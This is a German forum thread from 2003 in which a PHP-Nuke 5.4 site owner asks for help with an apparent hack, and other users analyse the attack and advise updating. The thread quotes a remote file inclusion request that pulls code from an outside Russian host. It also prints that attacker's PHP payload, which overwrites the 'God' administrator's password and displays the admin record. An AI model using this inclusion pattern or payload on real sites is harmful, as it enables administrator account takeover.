gehackt?

Begonnen von thomas_d, 15 Januar 2003, 19:35:40

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

thomas_d

bin mir nicht ganz sicher, aber nachdem seit einigen tagen bei jedem seitenaufruf von  http://www.uni4u.com ein pop-up von irgendeiner russischen site aufgeht und dabei auch gleich 8 cookies von irgendwelchen russischen sites auf meinem rechner abgelegt werden, habe ich die vermutung, dass sich da jemand unerlaubt zutritt verschafft hat...
nun um das wieder abzustellen, wäre es nett, wenn mir da jemand behilflich sein könnte mit einigen tipps, wo ich denn suchen könnte/sollte um dieses äußerst lästige anhängsel wieder loszuwerden...

danke schon mal...

achja, das ganz läuft unter nuke 5.4...

oliver

schau mal auf www.zudteam.org/hacked.htm die haben mich auch gehackt. meine seite ist fhost.de

jubilee

Hallo !
PHP-Nuke 5.4 --------> UPDATEN !!!
Mindestens nach 5.5, VKP5.5, VKPMxxx, 5.6 etc....
Aber möglichst auch nicht nach 6.0.
Da sind auch einige sicherheitslecks drin.
MfG
jubilee

oliver

meinste ich sollte auch ein anderes nehmen. hab 6.0

jubilee

Hmmm.
Würde mich auf jeden Fall über die Sicherheitslecks informieren.
Guter Anlaufpunkt dafür ist :
http://www.kritikerseiten.de
Weiß aber nicht, ob es schon Fixes für die Probs gibt.
MfG
jubilee
 


oliver

morgen leute

habe gestern noch sämtliche fixes installiert.

thomas_d

also, eines hab ich schon gefunden:
im admin block wurde eine url mitgeladen...
und dann hab ich zum Glück das Tracking-Modul installiert und das mal durchforstet und da bin ich auf folgende Funktion gestossen:

213.85.117.138   index.php?file=http://vzlomer.boom.ru/admin 2.txt
 
kann mir da jemand sagen, was damit bewirkt wird?

und vor allem, wie ich in zukunft solche angriffe (halbwegs) in den griff bekommen kann...

oliver

da liest einer deine datenbank aus denk ich mal. habe mal den link http://vzlomer.boom.ru/admin2.txt ausprobiert. sieht wie dein verschlüsseltes admin passwort aus.

ERGEBNIS:
 
$dbi=@mysql_connect($dbhost, $dbuname, $dbpass);
mysql_select_db($db);
$query="update ".$prefix."_authors set pwd='dac4ee0311e1eb0ea46ee553bf4b2a56' where name='God'";
$result=mysql_query($query) or die ("error");
$query="select * from ".$prefix."_authors where name='God'";
$result=mysql_query($query) or die ("error");
$row_count=mysql_num_rows($result);
$row=mysql_fetch_array($result);
print ("$row[aid] \n\n");
print ("$row[pwd] \n\n");




[Editiert am 16/1/2003 von oliver]

jubilee

Was da genau abläuft kann man am Ergebnis nur ahnen.
Das hier  
Zitat$query="update ".$prefix."_authors set pwd='dac4ee0311e1eb0ea46ee553bf4b2a56' where name='God'";
könnte auch bedeuten es wird versucht ein neues Passwort für den God-Admin zu setzen.
Abwehren kannst Du das, indem Du von  dem unseeligen Nuke 5.4 auf eine neuere Version updatest.
Schau einmal, ob Du evt. schon einen Admin in der Datenbank
_authors hast, den Du nicht angelegt hast. Könnte sein, das der Hacker schon erfolg gehabt hat
MfG
jubilee

[Editiert am 16/1/2003 von SiteAdmin jubilee]

jubilee

Ich nochmal !
Hab mir das nochmal ganz durchgesehen.
1. Es wird versucht für den Admin mit Namen God ein Kennwort zu setzen.
2. Wenn das klappt, gehts weiter, sonst wird das Script beendet.
3. Alle informationen der Admin mit Namre God werden geholt.
4. Wenn das klappt -->weiter sonst ende des Script.
5. Die Informationen werden ausgegeben.

MfG
jubilee


[Editiert am 16/1/2003 von SiteAdmin jubilee]

jubilee

@thomas_d:
Wenn du noch den Nuke-Filemanager verwendest, denn deaktivier das
Ding. Ich glaube mich zu erinnern, das solcherart Angriffe darüber laufen.
MfG
jubilee  

Andi

Lustig dabei ist natürlich, wenn der Typ damit wirklich reinkommt....
Er könnte sich noch viel interessantere Sachen anzeigen lassen.
Schreibe ich hier jetzt aber nicht, nicht dass noch mehr auf den blöden Gedanken kommen ;)
schön´s Grüssle, Andi

DarkBoy

Der BUG und der Trick ist eigentlich schon so alt , das er nen bart hat!
Die einfachste Methode ist auf neuere Version wie hubilee schon sagte. Filemanger würde ich streichen, damit sind noch  ganz andere Sachen möglich ;)  Sicherheitsloch des Herren das teil.

Andi hat da uch schon Recht, es geht noch einiges mehr wenn man ds nuke Original nimmt. Aber logisch das wir hier keine Tips geben nicht mal um die kleinen Löcher zu flicken, sonst stossen wir ja unendlch viele drauf.

Nimm ein neueres Nuke und du wirst Ruhe haben.